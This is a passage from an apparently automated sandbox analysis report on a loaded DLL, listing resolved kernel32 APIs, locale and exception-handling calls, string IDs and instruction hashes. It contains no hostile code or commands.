                                                                                                      • Instruction Fuzzy Hash: 95E0ED7694E51106AAA2AA2F6C41F7A16941F82378F13032ADAB4CA1C1DF608C1689D2

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 478 6d4073ef-6d4076a8 GetModuleHandleW GetProcAddress * 40
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6D4073F5
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6D407403
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6D407414
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6D407425
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6D407436
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 6D407447
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 6D407458
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 6D407469
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 6D40747A
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 6D40748B
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 6D40749C
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 6D4074AD
                                                                                                      • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 6D4074BE
                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 6D4074CF
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 6D4074E0
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 6D4074F1
                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 6D407502
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 6D407513
                                                                                                      • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 6D407524
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 6D407535
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 6D407546
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 6D407557
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 6D407568
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 6D407579
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 6D40758A
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6D40759B
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 6D4075AC
                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 6D4075BD
                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 6D4075CE
                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 6D4075DF
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 6D4075F0
                                                                                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 6D407601
                                                                                                      • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 6D407612
                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 6D407623
                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 6D407634
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 6D407645
                                                                                                      • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 6D407656
                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 6D407667
                                                                                                      • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 6D407678
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 6D407689
                                                                                                      • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 6D40769A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                      • API String ID: 667068680-295688737
                                                                                                      • Opcode ID: 5f82f99e1c81b80b4cde5dd9f7d2654053486e02f48f712b2720f6606a169a7b
                                                                                                      • Instruction ID: 33d32b21966609a40af70721ab185a52347679d3784cc3550b56a20c4a5a0fd5
                                                                                                      • Opcode Fuzzy Hash: 5f82f99e1c81b80b4cde5dd9f7d2654053486e02f48f712b2720f6606a169a7b
                                                                                                      • Instruction Fuzzy Hash: CD61FB75C77290ABCF207FBA9A4DF677AB8BB0B281706451AB215D2505DB76CC00CF64
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                        • Part of subcall function 6D411F56: _free.LIBCMT ref: 6D411FB1
                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6D41DFBE
                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 6D41E019
                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 6D41E028
                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,|3Am,00000040,?,00000000,00000055,00000000,?,?,00000055,00000000), ref: 6D41E070
                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6D41E08F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser_free
                                                                                                      • String ID: DUBmE$|3Am$|3Am$|3Am
                                                                                                      • API String ID: 1213562535-849517993
                                                                                                      • Opcode ID: cbdc99c131164c46a593b483919b004912dedc154de9e7be36964cdbfa49ca4b
                                                                                                      • Instruction ID: 5a6714ffa74b4a4c51bee2e09a64e115540f171b31dcb0838687b40c91de0cc2
                                                                                                      • Opcode Fuzzy Hash: cbdc99c131164c46a593b483919b004912dedc154de9e7be36964cdbfa49ca4b
                                                                                                      • Instruction Fuzzy Hash: 375150B1908616ABEF00DFA5CC40FBA77B8BF85700F154469E925E7280E770DE048BA1
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,6D413383,?,?,?,?,?,?,00000004), ref: 6D41D642
                                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D413383,?,?,?,?,?,?,00000004), ref: 6D41D654
                                                                                                      • _wcschr.LIBVCRUNTIME ref: 6D41D6E4
                                                                                                      • _wcschr.LIBVCRUNTIME ref: 6D41D6F2
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6D413383,00000000,6D4134A3), ref: 6D41D795
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                      • String ID: DUBmE
                                                                                                      • API String ID: 4147378913-846794591
                                                                                                      • Opcode ID: c42781129d77499e6f22e455762580aacbd67f870e2cb7c5dd0fd2899c36f8ad
                                                                                                      • Instruction ID: 1aaad9fa96d89cc31803dd95c8a789d85962361d5790acf05da5eb0388c5b0f1
                                                                                                      • Opcode Fuzzy Hash: c42781129d77499e6f22e455762580aacbd67f870e2cb7c5dd0fd2899c36f8ad
                                                                                                      • Instruction Fuzzy Hash: 52710AB160C606AAEB14EF34CC41FB673A8FF85354F21452DEA29D7680E770ED4187A0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __floor_pentium4
                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                      • Opcode ID: 3f2b34af4830b828fc7f1605e063af61d1785e03cea7c58271865b1384ececc0
                                                                                                      • Instruction ID: 26507d61cbb9b550c476b4b239bf9667cc08270c546df6c2d4328dfce6fcccf4
                                                                                                      • Opcode Fuzzy Hash: 3f2b34af4830b828fc7f1605e063af61d1785e03cea7c58271865b1384ececc0
                                                                                                      • Instruction Fuzzy Hash: B5C25A71E086298BDB25CE28CD40BEAB7B5FB4A344F1041EAD85DE7340E775AE858F41
                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6D41DFFD,?,00000000), ref: 6D41DD70
                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6D41DFFD,?,00000000), ref: 6D41DD99
                                                                                                      • GetACP.KERNEL32(?,?,6D41DFFD,?,00000000), ref: 6D41DDAE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID: ACP$OCP
                                                                                                      • API String ID: 2299586839-711371036
                                                                                                      APIs
                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6D408677
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 6D408743
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D408763
                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 6D40876D
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 254469556-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                        • Part of subcall function 6D411F56: _free.LIBCMT ref: 6D411FB1
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D41D9B2
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D41DA03
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D41DAC3
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale$ErrorLast$_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1690466582-0
                                                                                                      APIs
                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6D40D258
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6D40D262
                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6D40D26F
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                      • String ID:
                                                                                                      • API String ID: 3906539128-0
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(?,?,6D4102D6,?,00000000,?,?,?,6D4153C8), ref: 6D4102F9
                                                                                                      • TerminateProcess.KERNEL32(00000000,?,6D4102D6,?,00000000,?,?,?,6D4153C8), ref: 6D410300
                                                                                                      • ExitProcess.KERNEL32 ref: 6D410312
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1703294689-0
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: .
                                                                                                      • API String ID: 0-248832578
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                      • EnumSystemLocalesW.KERNEL32(6D41D95E,00000001,00000000,?,|3Am,?,6D41DF92,00000000,?,?,?), ref: 6D41D8A7
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                      • String ID: |3Am
                                                                                                      • API String ID: 2417226690-4242667600
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                      • EnumSystemLocalesW.KERNEL32(6D41DBAE,00000001,00000000,?,|3Am,?,6D41DF56,|3Am,?,?,?,?,?,6D41337C,?,?), ref: 6D41D91D
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                      • String ID: |3Am
                                                                                                      • API String ID: 2417226690-4242667600
                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,?,?,?,6D413416,?,20001004,?,00000002,?), ref: 6D414F30
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID: Eh@m
                                                                                                      • API String ID: 2299586839-137412459
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      APIs
                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6D414365,?,?,00000008,?,?,6D41EED1,00000000), ref: 6D414597
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise
                                                                                                      • String ID:
                                                                                                      • API String ID: 3997070919-0
                                                                                                      • Opcode ID: eb5906647b92e80c7ffef04269104927bada5fd2f37ec9a7b4f0365c0026b295
                                                                                                      • Instruction ID: 7876821afff1c91c9ed3b8d0023efbfe1f1828830933ad895ceaa38ef8b47d2b
                                                                                                      • Opcode Fuzzy Hash: eb5906647b92e80c7ffef04269104927bada5fd2f37ec9a7b4f0365c0026b295
                                                                                                      • Instruction Fuzzy Hash: 13B109356146099FD705CF28C886B657BE0FF493A8F258658E9ADCF2A1C335ED92CB40
                                                                                                      APIs
                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6D40886A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 2325560087-0
                                                                                                      • Opcode ID: cab1bef96808c01e25e8448d8f8402e9f1178bb6876b562a915ec48ac15dcdad
                                                                                                      • Instruction ID: 9c93bd1e356d257ea76316a136fff4673329d59dbd3720938af7d9f741857d4d
                                                                                                      • Opcode Fuzzy Hash: cab1bef96808c01e25e8448d8f8402e9f1178bb6876b562a915ec48ac15dcdad
                                                                                                      • Instruction Fuzzy Hash: FD5149B1A0560A8BEB15EF9AD981BAABBF0FB49710F21852AD415EB340D374DD00CF60
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                        • Part of subcall function 6D411F56: _free.LIBCMT ref: 6D411FB1
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D41DC02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$InfoLocale_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 787680540-0
                                                                                                      • Opcode ID: dc35ed35177500309d8d4afc8a98cbf4db6b4f323083578d4e6ca1a9211dfe8e
                                                                                                      • Instruction ID: 050d7dd24af0a0d60986bad6d4811c1a2829a803cd5de4ff14d1e65528b4aed8
                                                                                                      • Opcode Fuzzy Hash: dc35ed35177500309d8d4afc8a98cbf4db6b4f323083578d4e6ca1a9211dfe8e
                                                                                                      • Instruction Fuzzy Hash: C521A1B255C20AABDB14DF24DC85FBA73A8EB85314F10457AEA15C6240FB759D44CB90
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6D41DB7C,00000000,00000000,?), ref: 6D41DE0B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 3736152602-0
                                                                                                      • Opcode ID: efb86c5c5b344a9e8936ffebd3f1dba60fef14fa500672f96861aaf6a75758c3
                                                                                                      • Instruction ID: db0d24d9af8e3706f5a244a4fc0947454bcc8fc0ae949e0b6a09a83eed3a76e9
                                                                                                      • Opcode Fuzzy Hash: efb86c5c5b344a9e8936ffebd3f1dba60fef14fa500672f96861aaf6a75758c3
                                                                                                      • Instruction Fuzzy Hash: 40F0D172A18616ABDB149A24CC45FBB7768FBD0369F11446DED19A3240EB38BD12CAD0
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                        • Part of subcall function 6D411F56: _free.LIBCMT ref: 6D411FB1
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6D413383,00000000,6D4134A3), ref: 6D41D795
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$InfoLocale_free
                                                                                                      • String ID: DUBmE
                                                                                                      • API String ID: 787680540-846794591
                                                                                                      • Opcode ID: 0b3eef82f929ea098c0997bb27f18246dccad1d233bf6140f3bde90d2b9739f9
                                                                                                      • Instruction ID: 66125084af80faf4d88c177ad8de551d12079e9becfb704814b6322f0b82c2df
                                                                                                      • Opcode Fuzzy Hash: 0b3eef82f929ea098c0997bb27f18246dccad1d233bf6140f3bde90d2b9739f9
                                                                                                      • Instruction Fuzzy Hash: FBF0F472A59109ABDB14EF24DC04FBA73A8EB85324F0101BEEB1AD7240EB34AD058794
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D40D447: EnterCriticalSection.KERNEL32(?,?,6D40FED0,00000000,6D42E310,0000000C,6D40FE8B,?,?,?,6D41496C,?,?,6D4120FA,00000001,00000364), ref: 6D40D456
                                                                                                      • EnumSystemLocalesW.KERNEL32(6D414996,00000001,6D42E4D0,0000000C,6D414D85,00000000,00000000), ref: 6D4149DB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1272433827-0
                                                                                                      • Opcode ID: 5e839ced99b61e2fa146d03ceb2dd2039217d299048df75e9256642229aefeb8
                                                                                                      • Instruction ID: 075d5c0a9c6ccf40cc6ba7df760f18be983f4291f86e72cfbc9aa4ccd55e18c2
                                                                                                      • Opcode Fuzzy Hash: 5e839ced99b61e2fa146d03ceb2dd2039217d299048df75e9256642229aefeb8
                                                                                                      • Instruction Fuzzy Hash: B6F0497A924204EFDB10EFA9C944F6E37B0EB05328F028129E614EB291CB348D409B95
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
